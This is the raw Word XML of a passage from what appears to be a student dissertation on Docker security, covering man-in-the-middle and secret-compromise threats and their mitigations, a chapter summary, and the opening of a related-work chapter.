          <w:r w:rsidR="008E56C5">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00240D5C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F153BFE" w14:textId="420595D0" w:rsidR="00503FAB" w:rsidRDefault="00E17C37" w:rsidP="00B87CD1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc86859264"/>
      <w:r>
        <w:t>Man-In-The</w:t>
      </w:r>
      <w:r w:rsidR="00B87CD1">
        <w:t>-Middle Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="6B511F81" w14:textId="65C40689" w:rsidR="00B87CD1" w:rsidRDefault="008A6F42" w:rsidP="00B87CD1">
      <w:r>
        <w:t>Man-In-The-Middle</w:t>
      </w:r>
      <w:r w:rsidR="00AF0263">
        <w:t xml:space="preserve"> (MITM)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attack is </w:t>
      </w:r>
      <w:r w:rsidR="0051181E">
        <w:t xml:space="preserve">when a malicious user </w:t>
      </w:r>
      <w:r w:rsidR="008632BE">
        <w:t>intercepts communication between two legi</w:t>
      </w:r>
      <w:r w:rsidR="000225C7">
        <w:t>timate participants to alter</w:t>
      </w:r>
      <w:r w:rsidR="00284969">
        <w:t xml:space="preserve"> or steal </w:t>
      </w:r>
      <w:r w:rsidR="00593A0A">
        <w:t>valuable information</w:t>
      </w:r>
      <w:r w:rsidR="00F90265">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AC4BEF">
        <w:t xml:space="preserve"> Similarly, </w:t>
      </w:r>
      <w:r w:rsidR="00AD663E">
        <w:t xml:space="preserve">threat actors can use </w:t>
      </w:r>
      <w:r w:rsidR="00213750">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00AD663E">
        <w:t xml:space="preserve">MITM </w:t>
      </w:r>
      <w:r w:rsidR="00881BFC">
        <w:t xml:space="preserve">technique to </w:t>
      </w:r>
      <w:r w:rsidR="000173AC">
        <w:t xml:space="preserve">spy or steal </w:t>
      </w:r>
      <w:r w:rsidR="00593503">
        <w:t xml:space="preserve">traffic </w:t>
      </w:r>
      <w:r w:rsidR="00FE3D85">
        <w:t xml:space="preserve">information </w:t>
      </w:r>
      <w:r w:rsidR="00593503">
        <w:t>between two legitimate containers.</w:t>
      </w:r>
      <w:r w:rsidR="00080CD5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0033246C">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00080CD5">
        <w:t>uch an attack can be defended by</w:t>
      </w:r>
      <w:r w:rsidR="0033246C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB60B8">
        <w:t xml:space="preserve">providing solid isolation </w:t>
      </w:r>
      <w:r w:rsidR="00D63E7B">
        <w:t>among containers</w:t>
      </w:r>
      <w:r w:rsidR="0069789A">
        <w:t xml:space="preserve"> with a secure and</w:t>
      </w:r>
      <w:r w:rsidR="004D1C09">
        <w:t xml:space="preserve"> proper network </w:t>
      </w:r>
      <w:r w:rsidR="000A2204">
        <w:t>settings</w:t>
      </w:r>
      <w:r w:rsidR="004D1C09">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003D49D7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00455DCD">
        <w:t xml:space="preserve">Also, the communication </w:t>
      </w:r>
      <w:r w:rsidR="008E2192">
        <w:t>link</w:t>
      </w:r>
      <w:r w:rsidR="00E65CF2">
        <w:t xml:space="preserve"> among t</w:t>
      </w:r>
      <w:r w:rsidR="00123AD1">
        <w:t>he containers</w:t>
      </w:r>
      <w:r w:rsidR="008E2192">
        <w:t xml:space="preserve"> needs to be encrypted</w:t>
      </w:r>
      <w:r w:rsidR="00E65CF2">
        <w:t xml:space="preserve"> with TLS </w:t>
      </w:r>
      <w:r w:rsidR="0052217D">
        <w:t xml:space="preserve">to avoid </w:t>
      </w:r>
      <w:r w:rsidR="00770C95">
        <w:t xml:space="preserve">MITM </w:t>
      </w:r>
      <w:r w:rsidR="004E7402">
        <w:t>attacks</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1782945654"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00E44427">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00E44427">
            <w:instrText xml:space="preserve"> CITATION TCo16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FC1665">
            <w:instrText xml:space="preserve"> \m NGe17</w:instrText>
          </w:r>
          <w:r w:rsidR="00E44427">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[46, 68]</w:t>
          </w:r>
          <w:r w:rsidR="00E44427">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="004E7402">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D207DDC" w14:textId="0264C776" w:rsidR="00FA7361" w:rsidRDefault="000E17FB" w:rsidP="00BF06AC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc86859265"/>
      <w:r>
        <w:t>Secret com</w:t>
      </w:r>
      <w:r w:rsidR="00BF06AC">
        <w:t>promises</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="6F449D15" w14:textId="51EA2640" w:rsidR="00BF06AC" w:rsidRDefault="00A537B7" w:rsidP="00BF06AC">
      <w:r>
        <w:t>A c</w:t>
      </w:r>
      <w:r w:rsidR="004824D5">
        <w:t xml:space="preserve">ontainer may </w:t>
      </w:r>
      <w:r w:rsidR="00222A03">
        <w:t>contain</w:t>
      </w:r>
      <w:r w:rsidR="0017746A">
        <w:t xml:space="preserve"> an application that </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">needs </w:t>
      </w:r>
      <w:r w:rsidR="00975273">
        <w:t>secrets</w:t>
      </w:r>
      <w:r w:rsidR="00D5645E">
        <w:t>, such as a password</w:t>
      </w:r>
      <w:r w:rsidR="00975273">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F17799">
        <w:t>to access other services or the host.</w:t>
      </w:r>
      <w:r w:rsidR="001C5520">
        <w:t xml:space="preserve"> For instance, </w:t>
      </w:r>
      <w:r w:rsidR="0099428F">
        <w:t xml:space="preserve">a container is </w:t>
      </w:r>
      <w:r w:rsidR="00E55CFB">
        <w:t>running SSH</w:t>
      </w:r>
      <w:r w:rsidR="00812B72">
        <w:t xml:space="preserve"> and is</w:t>
      </w:r>
      <w:r w:rsidR="00E55CFB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B277A6">
        <w:t xml:space="preserve">connected to another container that is </w:t>
      </w:r>
      <w:r w:rsidR="0037762F">
        <w:t>running a database application.</w:t>
      </w:r>
      <w:r w:rsidR="00812B72">
        <w:t xml:space="preserve"> In such a scenario, </w:t>
      </w:r>
      <w:r w:rsidR="007068A4">
        <w:t xml:space="preserve">if the </w:t>
      </w:r>
      <w:r w:rsidR="00EB48C0">
        <w:t xml:space="preserve">SSH </w:t>
      </w:r>
      <w:r w:rsidR="00D403E7">
        <w:t xml:space="preserve">key or </w:t>
      </w:r>
      <w:r w:rsidR="00900879">
        <w:t>password is compromised</w:t>
      </w:r>
      <w:r w:rsidR="00453C15">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001861AA">
        <w:t xml:space="preserve">an attacker </w:t>
      </w:r>
      <w:r w:rsidR="00453C15">
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="0065320B">
        <w:t>jeopardi</w:t>
      </w:r>
      <w:r w:rsidR="00D906C2">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0065320B">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00754BE4">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00A316C5">
        <w:t xml:space="preserve">overall system and </w:t>
      </w:r>
      <w:r w:rsidR="00490B69">
        <w:t xml:space="preserve">steal </w:t>
      </w:r>
      <w:r w:rsidR="008B6A5C">
        <w:t xml:space="preserve">personal </w:t>
      </w:r>
      <w:r w:rsidR="007B51D5">
        <w:t>data.</w:t>
      </w:r>
      <w:r w:rsidR="009659BF">
        <w:t xml:space="preserve"> In Docker, </w:t>
      </w:r>
      <w:r w:rsidR="00857709">
        <w:t xml:space="preserve">a running container may </w:t>
      </w:r>
      <w:r w:rsidR="00F05E00">
        <w:t>share its</w:t>
      </w:r>
      <w:r w:rsidR="00C939D9">
        <w:t xml:space="preserve"> API keys and password to </w:t>
      </w:r>
      <w:r w:rsidR="00F21D5C">
        <w:t>run a service</w:t>
      </w:r>
      <w:r w:rsidR="00984269">
        <w:t xml:space="preserve">, and thus </w:t>
      </w:r>
      <w:r w:rsidR="00777ECB">
        <w:t xml:space="preserve">it is </w:t>
      </w:r>
      <w:r w:rsidR="00504E6A">
        <w:t xml:space="preserve">imperative </w:t>
      </w:r>
      <w:r w:rsidR="0051119B">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="007E3F19">
        <w:t>keep these</w:t>
      </w:r>
      <w:r w:rsidR="00E343C6">
        <w:t xml:space="preserve"> secretes secured </w:t>
      </w:r>
      <w:r w:rsidR="008B38D4">
        <w:t xml:space="preserve">to protect </w:t>
      </w:r>
      <w:r w:rsidR="006A6444">
        <w:t>any security attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00AA4A76">
        <w:t xml:space="preserve"> In addition, </w:t>
      </w:r>
      <w:r w:rsidR="00880C73">
        <w:t xml:space="preserve">it is not good practice to </w:t>
      </w:r>
      <w:r w:rsidR="0058229F">
        <w:t xml:space="preserve">build a Docker image </w:t>
      </w:r>
      <w:r w:rsidR="00880C73">
        <w:t>containing</w:t>
      </w:r>
      <w:r w:rsidR="0058229F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A45996">
        <w:t xml:space="preserve">sensitive </w:t>
      </w:r>
      <w:r w:rsidR="00D43920">
        <w:t xml:space="preserve">information using environment </w:t>
      </w:r>
      <w:r w:rsidR="00D43920">
        <w:lastRenderedPageBreak/>
        <w:t>variables</w:t>
      </w:r>
      <w:r w:rsidR="009E54F2">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00171D70">
        <w:t xml:space="preserve"> It is also necessary to </w:t>
      </w:r>
      <w:r w:rsidR="0054654B">
        <w:t xml:space="preserve">maintain container files in read-only mode to avoid </w:t>
      </w:r>
      <w:r w:rsidR="00C12EE4">
        <w:t>such attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00C37F2D">
        <w:t xml:space="preserve"> Further, </w:t>
      </w:r>
      <w:r w:rsidR="003716A7">
        <w:t>containers n</w:t>
      </w:r>
      <w:r w:rsidR="00D63C73">
        <w:t>eed to run with non-root access</w:t>
      </w:r>
      <w:r w:rsidR="00410120">
        <w:t xml:space="preserve"> unless required to avoid </w:t>
      </w:r>
      <w:r w:rsidR="00EF4EF2">
        <w:t xml:space="preserve">privilege attacks and </w:t>
      </w:r>
      <w:r w:rsidR="006D7F56">
        <w:t xml:space="preserve">protect </w:t>
      </w:r>
      <w:r w:rsidR="008F7B35">
        <w:t>secret information</w:t>
      </w:r>
      <w:r w:rsidR="00C010CA">
        <w:t>, such as passwords and usernames</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="898862905"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="005871B3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="005871B3">
            <w:instrText xml:space="preserve"> CITATION SUp16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00900D17">
            <w:instrText xml:space="preserve"> \m OWA21</w:instrText>
          </w:r>
          <w:r w:rsidR="00952846">
            <w:instrText xml:space="preserve"> \m AMo15</w:instrText>
          </w:r>
          <w:r w:rsidR="005871B3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[57, 55, 69]</w:t>
          </w:r>
          <w:r w:rsidR="005871B3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00C010CA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA0B115" w14:textId="30F535A1" w:rsidR="00952846" w:rsidRDefault="0099358C" w:rsidP="00DA73D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc86859266"/>
      <w:r>
        <w:t>SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="584CACA6" w14:textId="35E556E6" w:rsidR="00E662C8" w:rsidRDefault="003517C4" w:rsidP="00E662C8">
      <w:r>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00BF33BB">
        <w:t xml:space="preserve">is chapter </w:t>
      </w:r>
      <w:r w:rsidR="004A319A">
        <w:t>detailed</w:t>
      </w:r>
      <w:r w:rsidR="00983FD2">
        <w:t xml:space="preserve"> extensive </w:t>
      </w:r>
      <w:r w:rsidR="00E91A7B">
        <w:t xml:space="preserve">background </w:t>
      </w:r>
      <w:r w:rsidR="00983FD2">
        <w:t xml:space="preserve">research </w:t>
      </w:r>
      <w:r w:rsidR="007C639D">
        <w:t xml:space="preserve">in all areas </w:t>
      </w:r>
      <w:r w:rsidR="00E91A7B">
        <w:t xml:space="preserve">related to </w:t>
      </w:r>
      <w:r w:rsidR="007D3205">
        <w:t>Docker containeri</w:t>
      </w:r>
      <w:r w:rsidR="001751C2">
        <w:t xml:space="preserve">sation </w:t>
      </w:r>
      <w:r w:rsidR="00BF503F">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00A94827">
        <w:t>the development of this project.</w:t>
      </w:r>
      <w:r w:rsidR="00BB416D">
        <w:t xml:space="preserve"> The research highlight</w:t>
      </w:r>
      <w:r w:rsidR="009602EA">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00870D0A">
        <w:t xml:space="preserve"> the benefits of both virtualisation and </w:t>
      </w:r>
      <w:r w:rsidR="00C7789F">
        <w:t>containerisation</w:t>
      </w:r>
      <w:r w:rsidR="006F1C8C">
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r w:rsidR="004E17F4">
        <w:t>n cloud computing</w:t>
      </w:r>
      <w:r w:rsidR="00AD1236">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006201A3">
        <w:t xml:space="preserve"> More specifically, th</w:t>
      </w:r>
      <w:r w:rsidR="00253666">
        <w:t xml:space="preserve">e author </w:t>
      </w:r>
      <w:r w:rsidR="000B0521">
        <w:t xml:space="preserve">has outlined </w:t>
      </w:r>
      <w:r w:rsidR="00F35F0B">
        <w:t>the architecture and components of Docker</w:t>
      </w:r>
      <w:r w:rsidR="003E1E5D">
        <w:t xml:space="preserve"> systems.</w:t>
      </w:r>
      <w:r w:rsidR="001B4C3A">
        <w:t xml:space="preserve"> The research also </w:t>
      </w:r>
      <w:r w:rsidR="008D04D6">
        <w:t>outlined</w:t>
      </w:r>
      <w:r w:rsidR="00DA0328">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E6AE1">
        <w:t xml:space="preserve">best security </w:t>
      </w:r>
      <w:r w:rsidR="000E2312">
        <w:t>measures</w:t>
      </w:r>
      <w:r w:rsidR="006E4666">
        <w:t xml:space="preserve"> and techniques</w:t>
      </w:r>
      <w:r w:rsidR="006E6AE1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00836709">
        <w:t xml:space="preserve">to use Docker </w:t>
      </w:r>
      <w:r w:rsidR="00383418">
        <w:t>in production environment.</w:t>
      </w:r>
      <w:r w:rsidR="007336FE">
        <w:t xml:space="preserve"> Further</w:t>
      </w:r>
      <w:r w:rsidR="00ED6254">
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidR="00FF4D7C">
        <w:t xml:space="preserve"> research revealed </w:t>
      </w:r>
      <w:r w:rsidR="001E0CF1">
        <w:t xml:space="preserve">that Docker is </w:t>
      </w:r>
      <w:r w:rsidR="006E163F">
        <w:t>prone to some of the most c</w:t>
      </w:r>
      <w:r w:rsidR="0088567B">
        <w:t xml:space="preserve">ommon </w:t>
      </w:r>
      <w:r w:rsidR="005C3AB6">
        <w:t>attacks</w:t>
      </w:r>
      <w:r w:rsidR="00DE7AC8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F49DF">
        <w:t>and provided</w:t>
      </w:r>
      <w:r w:rsidR="000A1424">
        <w:t xml:space="preserve"> various</w:t>
      </w:r>
      <w:r w:rsidR="00DE7AC8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0089095B">
        <w:t>mitigation techniques</w:t>
      </w:r>
      <w:r w:rsidR="005C3AB6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A437E3C" w14:textId="4966683B" w:rsidR="000260AA" w:rsidRPr="00E662C8" w:rsidRDefault="000260AA" w:rsidP="00E662C8">
      <w:r>
        <w:t xml:space="preserve">The next chapter will </w:t>
      </w:r>
      <w:r w:rsidR="00BB61AE">
        <w:t xml:space="preserve">cover a literature review </w:t>
      </w:r>
      <w:r w:rsidR="00AD6139">
        <w:t xml:space="preserve">of previous works related to </w:t>
      </w:r>
      <w:r w:rsidR="00EA00A4">
        <w:t>Docker security threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B00418F" w14:textId="77777777" w:rsidR="006850BF" w:rsidRPr="006850BF" w:rsidRDefault="006850BF" w:rsidP="006850BF"/>
    <w:p w14:paraId="6CD596DB" w14:textId="77777777" w:rsidR="00DA73D8" w:rsidRPr="00DA73D8" w:rsidRDefault="00DA73D8" w:rsidP="00DA73D8"/>
    <w:p w14:paraId="49690962" w14:textId="77777777" w:rsidR="001F1F71" w:rsidRDefault="001F1F71" w:rsidP="00DA4F65"/>
    <w:p w14:paraId="1A20E7D9" w14:textId="77777777" w:rsidR="00F03094" w:rsidRDefault="00F03094" w:rsidP="00DA4F65"/>
    <w:p w14:paraId="053D1C65" w14:textId="0022AA71" w:rsidR="00DA4F65" w:rsidRPr="00DA4F65" w:rsidRDefault="00DA4F65" w:rsidP="00DA4F65"/>
    <w:p w14:paraId="5C7B08E4" w14:textId="77777777" w:rsidR="00A74D34" w:rsidRDefault="00A74D34" w:rsidP="001351C8"/>
    <w:p w14:paraId="12C0EA38" w14:textId="77777777" w:rsidR="002E35B6" w:rsidRDefault="002E35B6" w:rsidP="001351C8"/>
    <w:p w14:paraId="715B14B9" w14:textId="77777777" w:rsidR="004C144B" w:rsidRPr="001351C8" w:rsidRDefault="004C144B" w:rsidP="001351C8"/>
    <w:p w14:paraId="75C64189" w14:textId="5CE0F011" w:rsidR="00961AAC" w:rsidRPr="00961AAC" w:rsidRDefault="00010B5D" w:rsidP="00961AAC">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B82E80" w14:textId="77777777" w:rsidR="00C85FE5" w:rsidRDefault="00C85FE5" w:rsidP="00CB686E"/>
    <w:p w14:paraId="13BE04BA" w14:textId="2A8AD796" w:rsidR="0067687A" w:rsidRDefault="0067687A" w:rsidP="00CB686E"/>
    <w:p w14:paraId="2B7D6E0F" w14:textId="77777777" w:rsidR="002E2C92" w:rsidRPr="00A053F2" w:rsidRDefault="002E2C92" w:rsidP="00CB686E"/>
    <w:p w14:paraId="1A4E388E" w14:textId="77777777" w:rsidR="00CA05D7" w:rsidRDefault="00CA05D7" w:rsidP="00CB686E"/>
    <w:p w14:paraId="4C3EE433" w14:textId="05E015B1" w:rsidR="00120C05" w:rsidRDefault="004E503A" w:rsidP="005434F9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc86859267"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00AE3406">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005434F9">
        <w:t>RELATED WORK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="00ACD815" w14:textId="628F31F1" w:rsidR="003C2A96" w:rsidRDefault="0099358C" w:rsidP="003C2A96">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc86859268"/>
      <w:r>
        <w:t>OVERVIEW</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="030B7EEB" w14:textId="5D2E0361" w:rsidR="004834C1" w:rsidRPr="004834C1" w:rsidRDefault="00EC514E" w:rsidP="004834C1">
      <w:r>
        <w:t xml:space="preserve">This chapter </w:t>
      </w:r>
      <w:r w:rsidR="00E41ED8">
        <w:t xml:space="preserve">aims to provide a comprehensive </w:t>
      </w:r>
      <w:r w:rsidR="00AE51A4">
        <w:t xml:space="preserve">literature review on </w:t>
      </w:r>
      <w:r w:rsidR="00CD2685">
        <w:t xml:space="preserve">various </w:t>
      </w:r>
      <w:r w:rsidR="00A82498">
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="00CD2685">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0086403D">
        <w:t>threats</w:t>
      </w:r>
      <w:r w:rsidR="00CD2685">
        <w:t xml:space="preserve"> on Docker </w:t>
      </w:r>
      <w:r w:rsidR="00D77A9D">
        <w:t xml:space="preserve">components based </w:t>
      </w:r>
      <w:r w:rsidR="00FB7266">
        <w:t xml:space="preserve">upon previous related </w:t>
      </w:r>
      <w:r w:rsidR="0080561B">
        <w:t xml:space="preserve">or similar </w:t>
      </w:r>
      <w:r w:rsidR="00F57B8A">
        <w:t>works</w:t>
      </w:r>
      <w:r w:rsidR="001807FA">
        <w:t xml:space="preserve">, which </w:t>
      </w:r>
      <w:r w:rsidR="001F6639">
        <w:t>should</w:t>
      </w:r>
      <w:r w:rsidR="00DA72B0">
        <w:t xml:space="preserve"> help the </w:t>
      </w:r>
      <w:r w:rsidR="008774A3">
        <w:t>researcher</w:t>
      </w:r>
      <w:r w:rsidR="00DA72B0">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="001F6639">
        <w:t xml:space="preserve">conduct </w:t>
      </w:r>
      <w:r w:rsidR="00967AAB">
        <w:t>various security attacks on Docker systems</w:t>
      </w:r>
      <w:r w:rsidR="00E7134C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F47D73">
        <w:t xml:space="preserve"> This section will</w:t>
      </w:r>
      <w:r w:rsidR="00612200">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D7058">
        <w:t>investigate</w:t>
      </w:r>
      <w:r w:rsidR="00831F4A">
        <w:t xml:space="preserve"> and contemplate</w:t>
      </w:r>
      <w:r w:rsidR="003826E1">
        <w:t xml:space="preserve"> the methods,</w:t>
      </w:r>
      <w:r w:rsidR="00B04D60">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF348E">
        <w:t>approaches</w:t>
      </w:r>
      <w:r w:rsidR="005B6C9A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00343C8E">
        <w:t>resources</w:t>
      </w:r>
      <w:r w:rsidR="00FA4420">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00343C8E">
        <w:t xml:space="preserve"> and tools used to </w:t>
      </w:r>
      <w:r w:rsidR="00631CA1">
        <w:t>produce</w:t>
      </w:r>
      <w:r w:rsidR="00C5645E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C2358E">
        <w:t>similar</w:t>
      </w:r>
      <w:r w:rsidR="00C5645E">
        <w:t xml:space="preserve"> projects</w:t>
      </w:r>
      <w:r w:rsidR="00631CA1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00722509">
        <w:t xml:space="preserve"> The research </w:t>
      </w:r>
      <w:r w:rsidR="005875CA">
        <w:t xml:space="preserve">process is organised </w:t>
      </w:r>
      <w:r w:rsidR="004207F1">
        <w:t xml:space="preserve">into groups based </w:t>
      </w:r>
      <w:r w:rsidR="008E077A">
        <w:t xml:space="preserve">upon </w:t>
      </w:r>
      <w:r w:rsidR="009320F1">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00B52FDE">
        <w:t>security attacks on Docker components</w:t>
      </w:r>
      <w:r w:rsidR="00A848D5">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003235BA">
        <w:t xml:space="preserve"> Therefore</w:t>
      </w:r>
      <w:r w:rsidR="00402780">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003E2BEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00402780">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="003E2BEC">
        <w:t xml:space="preserve">his </w:t>
      </w:r>
      <w:r w:rsidR="00720431">
        <w:t>chapter</w:t>
      </w:r>
      <w:r w:rsidR="003E2BEC">
        <w:t xml:space="preserve"> will help the author to </w:t>
      </w:r>
      <w:r w:rsidR="00E97FDA">
        <w:t xml:space="preserve">get </w:t>
      </w:r>
      <w:r w:rsidR="003235BA">
        <w:t>better understanding on the security aspect of Docker containers.</w:t>
      </w:r>
      <w:r w:rsidR="003A5E4F">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="00B64066">
        <w:t xml:space="preserve">reviewing and analysing </w:t>
      </w:r>
      <w:r w:rsidR="00957D93">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00B64066">
        <w:t xml:space="preserve"> these </w:t>
      </w:r>
      <w:r w:rsidR="0025005D">
        <w:t xml:space="preserve">related </w:t>
      </w:r>
      <w:r w:rsidR="00D562ED">
        <w:t xml:space="preserve">topics </w:t>
      </w:r>
      <w:r w:rsidR="00A24048">
        <w:t xml:space="preserve">will assist </w:t>
      </w:r>
      <w:r w:rsidR="00056302">
        <w:t xml:space="preserve">the author </w:t>
      </w:r>
      <w:r w:rsidR="00730011">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00056302">
        <w:t>develop</w:t>
      </w:r>
      <w:r w:rsidR="00730011">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00056302">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F10F7">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00385970">
        <w:t xml:space="preserve">project’s </w:t>
      </w:r>
      <w:r w:rsidR="0085222C">
        <w:t>aims and objectives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CBED4B" w14:textId="3D367124" w:rsidR="003C2A96" w:rsidRDefault="00665E38" w:rsidP="004834C1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc86859269"/>
      <w:r>
        <w:t>LITERATURE REVIEW</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="388E9B95" w14:textId="1F46B10B" w:rsidR="004834C1" w:rsidRDefault="000F58CD" w:rsidP="000F58CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc86859270"/>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="000A1C7F">
        <w:t>onta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">iner vs </w:t>
      </w:r>
      <w:r w:rsidR="005D590B">
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t>irtualisation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="64FE379A" w14:textId="64CC4BBC" w:rsidR="007B655A" w:rsidRDefault="008E5DF0" w:rsidP="007B655A">
      <w:r>
        <w:t xml:space="preserve">The researchers in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1174718453"/>
          <w:citation/>
        </w:sdtPr>
